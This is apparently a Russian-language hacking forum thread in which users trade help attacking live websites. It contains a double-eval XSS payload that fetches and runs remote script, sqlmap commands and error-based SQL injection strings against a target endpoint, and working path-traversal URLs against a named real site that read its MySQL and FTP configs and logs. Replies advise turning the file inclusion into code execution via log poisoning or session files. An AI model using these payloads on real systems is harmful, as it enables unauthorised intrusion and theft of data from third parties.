HTML: <p><img name="xhr=new XMLHttpRequest();xhr.open('GET','http://host/images/s/s.php',false);xhr.send();xhr.responseText" onerror="eval(name)" /></p> нужно дважды евалить HTML: <p><img name="xhr=new XMLHttpRequest();xhr.open('GET','http://host/images/s/s.php',false);xhr.send();xhr.responseText" onerror="eval(eval(name))" /></p> первый eval() выполняет код из name, то есть получает твой payload, а второй eval() уже выполняет данный payload
Вопрос по SQL injection Code: GET /getaddr.cgi?heataccount=%5c Spoiler: скриншот Code: -u https://site.com/getaddr.cgi?heataccount=1%5c --dbs --no-cast --random-agent --dbms=mysql -v5 --level 2 --risk 3 Code: -u https://site.com/getaddr.cgi?heataccount=%5c -p heataccount --dbs --no-cast --random-agent --level 2 --risk 3 Не катит он тупа не видит Как раскрутить кто знает ?
level=5 попробуй в мапе, ну и руками error based вектор пробуй. Code: /getaddr.cgi?heataccount=1" and extractvalue(0x0a,concat(0x0a,(database()))-- /getaddr.cgi?heataccount=1" and updatexml(NULL,concat(0x3a,(database())),Null)--
look here https://rdot.org/forum/showthread.php?t=2869 https://rdot.org/forum/showpost.php?p=18012&postcount=10
Итак, есть сайт enature.net, он не очень хороший и вообще сами можете тематику посмотреть. Весьма легальный, работает с 95-го года. Нашел LFI через сканер (netsparker), до этого дел с PHP-include не имел, выглядит примерно так: Code: https://www.enature.net/nudist_gallery/full_image/?param=/../../../../../../../../../../proc/version Что нашел: - конфиг мускула Code: https://www.enature.net/nudist_gallery/full_image/?page=/../../../../../../../../../../etc/mysql/my.cnf - конфиг фтп Code: https://www.enature.net/nudist_gallery/full_image/?page=/../../../../../../../../../../etc/protpd/proftpd.conf - логи фтп (не нашел подключения) Code: https://www.enature.net/nudist_gallery/full_image/?page=/../../../../../../../../../../var/log/xferlog https://www.enature.net/nudist_gallery/full_image/?page=/../../../../../../../../../../var/log/cdninvalidate.log Что не могу найти: - логи апача - способ залиться
С СНГ IP может не пускать. Забыл поздороваться и попросить помощи, ну вы поняли. Ковырял часа 4 к ряду, уже хз, может просто не разрешает читать логи (но при этом разрешает конфиги?)
Опять эти корпоративные свиньи пугают уязвимостями чтобы я купил лицуху сканера. Спасибо, как читалку отличить от инклуда? Пускать в логи должно?
Ну хорошо, но чтобы он выполнился нужно всунуть в логи, правильно? То-есть там через юзерагент, логины и прочие пляски. Или есть еще варианты? Я не в теме, пишу без наездов, вам все кажется.
С большой долей вероятности можно определить исходя из контекста. В этом случае, по URI видно, что используется некий функционал галереи, а по заголовкам можно понять, что отдаётся содержимое файла: Code: Content-Disposition: inline; filename="" Content-Length: 0 Connection: close Content-Type: image/jpeg Но если какие либо внешние факторы отсутствуют, то да, нужно подтверждать экспериментально. Читалка/инклуд на доступ к логам не влияют. Зависит от настроек системы и текущего пользователя.
Либо прочитать любой PHP скрипт Code: https://www.enature.net/nudist_gallery/full_image/?page=/../index.php
Спасибо, я гуманитарий просто. А если нет доступа к логам - как выглядит процесс запуска своего кода, через сеансы?
Для этого 1) должен быть инклуд 2) не должно быть расширение(или его можно откинуть) 3) должен знать имя своего сеансового файла site.ru/?page=../../../../../../var/log/sess_file ____________________________________________________________________________ Spoiler https://rdot.org/forum/showthread.php?t=343 https://xakep.ru/2012/01/25/58183/ https://rdot.org/forum/showthread.php?t=1134